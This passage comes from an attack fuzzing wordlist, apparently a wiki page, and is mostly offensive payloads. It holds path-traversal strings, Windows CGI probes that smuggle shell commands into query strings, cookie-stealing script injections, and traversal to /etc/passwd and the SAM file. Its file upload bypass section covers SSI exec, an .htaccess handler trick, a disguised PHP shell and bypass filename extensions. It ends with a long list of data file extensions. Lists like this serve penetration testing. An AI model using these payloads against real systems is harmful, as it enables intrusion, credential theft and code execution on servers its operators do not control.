..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI   (Update: 17 March 2010)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 s ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename &amp;lt;pre&amp;gt;Appends  (Update: 17 March 2009  ===&lt;br /&gt;
# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename  Appends  (&amp;lt;pre&amp;gt;Update: 17 March 2009  ===&lt;br /&gt;
#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009 &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863 ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
